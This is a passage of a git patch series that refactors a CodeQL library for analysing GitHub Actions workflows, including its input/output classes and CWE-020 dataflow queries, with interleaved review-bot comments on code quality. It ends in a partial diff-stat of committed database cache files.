@@ -81,34 +90,43 @@ class ReusableWorkflow extends Workflow { ReusableWorkflow() { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - Inputs getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } - Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } -} -class Inputs extends AstNode instanceof YamlMapping { - YamlMapping parent; + Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - Inputs() { parent.lookup("inputs") = this } + Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } - /** - * Gets a specific input expression (YamlMapping) by name. - */ - InputExpr getInputExpr(string name) { - result.(YamlString).getValue() = name and - this.(YamlMapping).maps(result, _) + Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + + Input getInput(string name) { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and + result.(YamlString).getValue() = name } } +class Input extends AstNode { + YamlMapping parent; + + Input() { parent.lookup("inputs").(YamlMapping).maps(this, _) } +} + class Outputs extends AstNode instanceof YamlMapping { YamlMapping parent; Outputs() { parent.lookup("outputs") = this } /** - * Gets a specific output expression (YamlMapping) by name. + * Gets an output expression. + */ + Expression getAnOutputExpr() { + this.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = result or + this.(YamlMapping).lookup(_) = result + } + + /** + * Gets a specific output expression by name. */ - OutputExpr getOutputExpr(string name) { + Expression getOutputExpr(string name) { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or this.(YamlMapping).lookup(name) = result } 
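Review bot: `Input` is undocumented and its characteristic predicate accepts any key of any mapping reached via `parent.lookup("inputs")`, so, as far as this hunk shows, a key under `on.workflow_dispatch.inputs` would also become an `Input`, not only a reusable-workflow or composite-action input; if that is intended, say so in a QLDoc comment such as `/** A key of any inputs mapping (reusable workflow, composite action, or trigger inputs). */`, otherwise anchor `parent` to a `ReusableWorkflow`'s `workflow_call` mapping or a `CompositeAction`. `Outputs.getAnOutputExpr()` duplicates the body of `getOutputExpr`; `Expression getAnOutputExpr() { result = this.getOutputExpr(_) }` expresses the same thing without two copies to maintain.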
@@ -130,7 +148,7 @@ class Strategy extends AstNode instanceof YamlMapping { /** * Gets a specific matric expression (YamlMapping) by name. */ - MatrixVariableExpr getMatrixVariableExpr(string name) { + Expression getMatrixVariableExpr(string name) { this.(YamlMapping).lookup("matrix").(YamlMapping).lookup(name) = result } 
@@ -318,41 +336,40 @@ class Run extends Step { string getScript() { result = scriptExpr.getValue() } } -/** - * An AST node associated with a Reusable Workflow input. - */ -class InputExpr extends AstNode { - InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } -} - -/** - * An AST node holding an Env var value. - */ -class EnvExpr extends AstNode { - EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } -} - -/** - * An AST node holding a job or workflow output var. - */ -class OutputExpr extends AstNode { - OutputExpr() { - exists(Outputs outputs | - outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or - outputs.(YamlMapping).lookup(_) = this - ) - } -} - -/** - * An AST node holding a matrix var. - */ -class MatrixVariableExpr extends AstNode { - MatrixVariableExpr() { - exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) - } -} - +// /** +// * An AST node associated with a Reusable Workflow input. +// */ +// class InputExpr extends AstNode { +// InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } +// } +// +// /** +// * An AST node holding an Env var value. +// */ +// class EnvExpr extends AstNode { +// EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } +// } +// +// /** +// * An AST node holding a job or workflow output var. +// */ +// class OutputExpr extends AstNode { +// OutputExpr() { +// exists(Outputs outputs | +// outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or +// outputs.(YamlMapping).lookup(_) = this +// ) +// } +// } +// +// /** +// * An AST node holding a matrix var. +// */ +// class MatrixVariableExpr extends AstNode { +// MatrixVariableExpr() { +// exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) +// } +// } /** * Evaluation of a workflow expression ${{}}. */ 
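Review bot: The four removed classes (`InputExpr`, `EnvExpr`, `OutputExpr`, `MatrixVariableExpr`) are kept as roughly thirty lines of `//`-commented code instead of being deleted; the history is in version control, and commented-out QL is not compiled, so it rots silently as `Inputs`, `Strategy` and `Actions::Env` evolve. Delete the block, or, if one of them is expected to come back, leave a single `// TODO: reintroduce MatrixVariableExpr once ... ` line naming it. The same applies to the commented-out `OutputExprTree`, `MatrixVariableExprTree` and `EnvExprTree` leaves in `controlflow/internal/Cfg.qll` later in this patch.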
@@ -508,9 +525,9 @@ class InputsExpression extends ContextExpression { override AstNode getTarget() { result.getLocation().getFile() = this.getLocation().getFile() and ( - exists(ReusableWorkflow w | w.getInputs().getInputExpr(fieldName) = result) + exists(ReusableWorkflow w | w.getInput(fieldName) = result) or - exists(CompositeAction a | a.getInputs().getInputExpr(fieldName) = result) + exists(CompositeAction a | a.getInput(fieldName) = result) ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 2bc867234931..661544dfed25 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -148,8 +148,8 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos result = rank[i](AstNode child, Location l | ( - child = this.(CompositeAction).getInputs() or - child = this.(CompositeAction).getOutputs() or + child = this.(CompositeAction).getAnInput() or + child = this.(CompositeAction).getAnOutputExpr() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,10 +172,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { result = rank[i](AstNode child, Location l | ( - child = this.(ReusableWorkflow).getInputs() or - child = this.(ReusableWorkflow).getOutputs() or - child = this.(ReusableWorkflow).getStrategy() or - child = this.(ReusableWorkflow).getAJob() + child = this.(ReusableWorkflow).getAJob() or + child = this.(ReusableWorkflow).getAnInput() or + child = this.(ReusableWorkflow).getAnOutputExpr() or + child = this.(ReusableWorkflow).getStrategy() ) and l = child.getLocation() | 
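Review bot: In the `CompositeActionTree` and `WorkflowTree` hunks the `Outputs` container (`getOutputs()`) is dropped from the child list in favour of `getAnOutputExpr()`, yet `OutputsTree` survives in the next Cfg.qll hunk and `Outputs` is still listed as a `DataFlowExpr` in DataFlowPrivate.qll. If no tree lists the container as a child any more, those nodes presumably become unreachable in the CFG and in turn absent from the dataflow graph (hedged, since `getAnOutputExpr` and `Outputs` are defined outside this diff). Either keep the container as a child or remove `OutputsTree` and the `Outputs` case, so the three places stay consistent. A short comment on the child list, e.g. `// inputs and output expressions are attached directly; their containers are not CFG nodes`, would document whichever is intended.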
@@ -199,19 +199,6 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { } } -private class InputsTree extends StandardPreOrderTree instanceof Inputs { - override ControlFlowTree getChildNode(int i) { - result = - rank[i](AstNode child, Location l | - child = super.getInputExpr(_) and l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } -} - private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = @@ -287,14 +274,13 @@ private class RunTree extends StandardPreOrderTree instanceof Run { private class UsesLeaf extends LeafTree instanceof Uses { } -private class InputExprTree extends LeafTree instanceof InputExpr { } - -private class OutputExprTree extends LeafTree instanceof OutputExpr { } - -private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } - -private class EnvExprTree extends LeafTree instanceof EnvExpr { } +private class InputTree extends LeafTree instanceof Input { } +// private class OutputExprTree extends LeafTree instanceof OutputExpr { } +// +// private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } +// +// private class EnvExprTree extends LeafTree instanceof EnvExpr { } private class ExprAccessTree extends LeafTree instanceof ContextExpression { } private class AstNodeLeaf extends LeafTree instanceof Expression { } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c30c963afdb0..32d37efdaaea 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -160,7 +160,7 @@ private class ExternallyDefinedSource extends RemoteFlowSource { private class CompositeActionInputSource extends RemoteFlowSource { CompositeAction c; - CompositeActionInputSource() { c.getInputs().getInputExpr(_) = this.asExpr() } + CompositeActionInputSource() { c.getAnInput() = this.asExpr() } override string getSourceType() { result = "Composite action input" } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 62975959b399..d99db775d613 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -54,8 +54,13 @@ DataFlowType getNodeType(Node node) { any() } predicate nodeIsHidden(Node node) { none() } class DataFlowExpr extends Cfg::Node { - DataFlowExpr() { any() } - //DataFlowExpr() { this.getAstNode() instanceof Expression } + DataFlowExpr() { + this.getAstNode() instanceof Expression or + this.getAstNode() instanceof Uses or + this.getAstNode() instanceof Run or + this.getAstNode() instanceof Outputs or + this.getAstNode() instanceof Input + } } /** @@ -150,7 +155,7 @@ ContentApprox getContentApprox(Content c) { result = c } * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflow w).getInputs().getInputExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflow w).getInput(this)) } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index a8434cdb6033..dbae273151b0 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
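Review bot: The new `DataFlowExpr` characteristic predicate enumerates five AST node kinds with no comment on why these and not others, such as `Strategy` matrix values or `Env` entries whose `*Expr` classes this commit comments out; any CFG node outside the list silently stops being a dataflow node, which presumably narrows what the CWE-020/CWE-094 queries can observe. Add a doc comment such as `/** CFG nodes that take part in dataflow: expressions plus the Uses/Run/Outputs/Input nodes that carry values between them; anything else is not a dataflow node. */`, and a TODO if env and matrix values are meant to be covered later. The `ParameterPosition` hunk below derives positions from `ReusableWorkflow` inputs only, which may be intended but deserves a one-line comment as well.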
@@ -48,22 +48,19 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private InputExpr input; + private Input input; - ParameterNode() { - this.asExpr() = input and - input = any(Inputs s).getInputExpr(_) - } + ParameterNode() { this.asExpr() = input } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - input = c.(ReusableWorkflow).getInputs().getInputExpr(pos) + input = c.(ReusableWorkflow).getInput(pos) } override string toString() { result = "input " + input.toString() } override Location getLocation() { result = input.getLocation() } - InputExpr getInputExpr() { result = input } + Input getInput() { result = input } } /** diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 5bff6abc7bb9..4b78f275382a 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -25,7 +25,7 @@ private class ExpressionInjectionSink extends DataFlow::Node { private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getAnInput() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 12703a6cff2d..0edeb0a7ec80 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql 
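Review bot: `ParameterNode` now matches every `Input` (the `any(Inputs s)` restriction is gone), but `isParameterOf` still only resolves `ReusableWorkflow` callables and `ParameterPosition` in DataFlowPrivate.qll is likewise built from `ReusableWorkflow` inputs. If `Input` also covers composite-action inputs (its definition is outside this diff), those become parameter nodes with no callable, which is easy to misread when debugging flow. Either restrict the charpred to reusable-workflow inputs, or document the asymmetry: `/** A reusable workflow or composite action input. Only reusable workflow inputs are bound to a callable via isParameterOf. */`. The class continues beyond the hunk.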
@@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index e5933a73b36c..59a05f64b6c9 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getAnInput() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 1e1f942b200d..28ff074fd966 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -25,7 +25,7 @@ private class ExpressionInjectionSink extends DataFlow::Node { private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 7bcea3d45b02..6e88f36feced 100644 
--- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 5ac0c2999295..4f710a16e8f6 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 7524e31f050b..abdd087590a3 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
@@ -29,13 +29,9 @@ query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { - n.getLocation().getFile().getBaseName() = "argus_case_study.yml" -} //any() } +query predicate cfgNodes(Cfg::Node n) { n.getLocation().getFile().getBaseName() = "test.yml" } //any() } -query predicate dfNodes(DataFlow::Node e) { - e.getLocation().getFile().getBaseName() = "argus_case_study.yml" -} //any() } +query predicate dfNodes(DataFlow::Node e) { e.getLocation().getFile().getBaseName() = "test.yml" } //any() } query predicate exprNodes(DataFlow::Node e) { any() } From 1c2f19f4e168b846508f76937118f6c94a245eca Mon Sep 17 00:00:00 2001 
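Review bot: Both rewritten query predicates keep the dead `//any() }` tail left over from toggling the filter; now that each predicate sits on one line it reads as stray code. Drop it, e.g. `query predicate cfgNodes(Cfg::Node n) { n.getLocation().getFile().getBaseName() = "test.yml" }`, or if the unfiltered form is still useful, turn it into a proper `// replace the filter with any() to dump every node` comment. Hardcoding the fixture basename also means nodes from any other test file are silently excluded from the expected output, which is worth stating in a comment.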
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 1 Mar 2024 16:06:06 +0100 Subject: [PATCH 083/707] Merge Actions.qll and Ast.qll --- clean.sh | 2 + db/baseline-info.json | 1 + db/codeql-database.yml | 10 + db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 0 -> 40 bytes .../pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 0 -> 40 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 0 -> 8192 bytes .../cached-strings/pools/0/indices1/info | Bin 0 -> 40 bytes .../pools/0/indices1/page-000000 | Bin 0 -> 8192 bytes .../default/cache/cached-strings/pools/0/info | Bin 0 -> 41 bytes .../cached-strings/pools/0/metadata/info | Bin 0 -> 40 bytes .../pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../cache/cached-strings/pools/poolInfo | Bin 0 -> 28 bytes .../cache/cached-strings/tuple-pool/header | Bin 0 -> 4 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 0 -> 16 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 0 -> 216 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 0 -> 320 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 0 -> 216 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 0 -> 6312 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 0 -> 16 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 0 -> 12 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 0 -> 16 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 0 -> 12 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 0 -> 16 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 0 -> 12 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 0 -> 24 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-0defa4a0 | Bin 0 -> 16 bytes ...king#f6f2598d--TaintFlow-0defa4a0#0#tttttt | Bin 0 -> 3200 bytes 
...Tracking#f6f2598d--TaintFlow-0defa4a0#1#tt | Bin 0 -> 896 bytes ...TaintTracking#f6f2598d--TaintFlow-5b92615f | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-5b92615f#0# | Bin 0 -> 12 bytes ...racking#f6f2598d--TaintFlow-5b92615f#1#ttt | Bin 0 -> 152 bytes ...TaintTracking#f6f2598d--TaintFlow-6e089ab6 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-6e089ab6#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-a2a08e4a | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-a2a08e4a#0# | Bin 0 -> 12 bytes ...Tracking#f6f2598d--TaintFlow-a2a08e4a#1#tt | Bin 0 -> 116 bytes ...TaintTracking#f6f2598d--TaintFlow-b0571e78 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-b0571e78#0# | Bin 0 -> 12 bytes ...tTracking#f6f2598d--TaintFlow-b0571e78#1#t | Bin 0 -> 88 bytes ...TaintTracking#f6f2598d--TaintFlow-b18fe878 | Bin 0 -> 16 bytes ...tTracking#f6f2598d--TaintFlow-b18fe878#0#t | Bin 0 -> 2216 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 0 -> 16 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 0 -> 12 bytes ...ow---Cached--TAccessPathFront-12309985#1#t | Bin 0 -> 104 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 0 -> 16 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 0 -> 12 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 0 -> 112 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 0 -> 12 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 0 -> 112 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 0 -> 12 bytes ...---Cached--TApproxAccessPathF-baba9c49#1#t | Bin 0 -> 104 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 0 -> 16 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 0 -> 12 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 0 -> 24 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 0 -> 16 bytes 
...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 0 -> 12 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 0 -> 12 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 0 -> 16 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 0 -> 12 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 0 -> 280 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 0 -> 16 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 0 -> 12 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 0 -> 16 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 0 -> 12 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 0 -> 16 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 0 -> 12 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 0 -> 12 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 0 -> 16 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 0 -> 16 bytes .../tuples#DataFlowPrivate#6a54d7ad--TContent | Bin 0 -> 16 bytes ...les#DataFlowPrivate#6a54d7ad--TContent#0#s | Bin 0 -> 104 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 0 -> 16 bytes ...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 0 -> 12 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 0 -> 16 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 0 -> 2216 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 0 -> 16 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 0 -> 12 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 0 -> 16 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 0 -> 12 bytes ...4d7ad--DataFlowType---TOption-4fb642c9#1#t | Bin 0 -> 16 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 0 -> 16 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 0 -> 12 bytes ...Unit#54592529--Unit---TOption-51176e26#1#t | Bin 0 -> 16 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 0 -> 16 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 0 -> 12 bytes 
db/db-yaml/default/cache/pages/01.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/01.pack.d | Bin 0 -> 844 bytes db/db-yaml/default/cache/pages/02.pack | Bin 0 -> 79 bytes db/db-yaml/default/cache/pages/08.pack | Bin 0 -> 87 bytes db/db-yaml/default/cache/pages/09.pack | Bin 0 -> 167 bytes db/db-yaml/default/cache/pages/09.pack.d | Bin 0 -> 2341 bytes db/db-yaml/default/cache/pages/0b.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/0b.pack.d | Bin 0 -> 292 bytes db/db-yaml/default/cache/pages/0d.pack | Bin 0 -> 84 bytes db/db-yaml/default/cache/pages/17.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/17.pack.d | Bin 0 -> 5326 bytes db/db-yaml/default/cache/pages/20.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/20.pack.d | Bin 0 -> 574 bytes db/db-yaml/default/cache/pages/24.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/24.pack.d | Bin 0 -> 6318 bytes db/db-yaml/default/cache/pages/26.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/26.pack.d | Bin 0 -> 294 bytes db/db-yaml/default/cache/pages/27.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/27.pack.d | Bin 0 -> 1493 bytes db/db-yaml/default/cache/pages/29.pack | Bin 0 -> 84 bytes db/db-yaml/default/cache/pages/2b.pack | Bin 0 -> 84 bytes db/db-yaml/default/cache/pages/2d.pack | Bin 0 -> 91 bytes db/db-yaml/default/cache/pages/33.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/33.pack.d | Bin 0 -> 393 bytes db/db-yaml/default/cache/pages/37.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/37.pack.d | Bin 0 -> 106 bytes db/db-yaml/default/cache/pages/3c.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/3c.pack.d | Bin 0 -> 916 bytes db/db-yaml/default/cache/pages/42.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/42.pack.d | Bin 0 -> 5053 bytes db/db-yaml/default/cache/pages/45.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/45.pack.d | Bin 0 -> 6001 bytes db/db-yaml/default/cache/pages/46.pack | Bin 0 -> 111 bytes 
db/db-yaml/default/cache/pages/4c.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/4c.pack.d | Bin 0 -> 302 bytes db/db-yaml/default/cache/pages/4d.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/4d.pack.d | Bin 0 -> 3292 bytes db/db-yaml/default/cache/pages/4e.pack | Bin 0 -> 116 bytes db/db-yaml/default/cache/pages/4e.pack.d | Bin 0 -> 1048 bytes db/db-yaml/default/cache/pages/54.pack | Bin 0 -> 320 bytes db/db-yaml/default/cache/pages/55.pack | Bin 0 -> 91 bytes db/db-yaml/default/cache/pages/5d.pack | Bin 0 -> 221 bytes db/db-yaml/default/cache/pages/62.pack | Bin 0 -> 159 bytes db/db-yaml/default/cache/pages/6a.pack | Bin 0 -> 179 bytes db/db-yaml/default/cache/pages/6f.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/6f.pack.d | Bin 0 -> 1695 bytes db/db-yaml/default/cache/pages/7a.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/7a.pack.d | Bin 0 -> 1284 bytes db/db-yaml/default/cache/pages/7b.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/7b.pack.d | Bin 0 -> 151 bytes db/db-yaml/default/cache/pages/84.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/84.pack.d | Bin 0 -> 3788 bytes db/db-yaml/default/cache/pages/88.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/88.pack.d | Bin 0 -> 91 bytes db/db-yaml/default/cache/pages/93.pack | Bin 0 -> 113 bytes db/db-yaml/default/cache/pages/96.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/96.pack.d | Bin 0 -> 1651 bytes db/db-yaml/default/cache/pages/9e.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/9e.pack.d | Bin 0 -> 1899 bytes db/db-yaml/default/cache/pages/a1.pack | Bin 0 -> 111 bytes db/db-yaml/default/cache/pages/a3.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/a3.pack.d | Bin 0 -> 5502 bytes db/db-yaml/default/cache/pages/aa.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/aa.pack.d | Bin 0 -> 570 bytes db/db-yaml/default/cache/pages/b5.pack | Bin 0 -> 89 bytes db/db-yaml/default/cache/pages/bd.pack | Bin 0 -> 89 bytes 
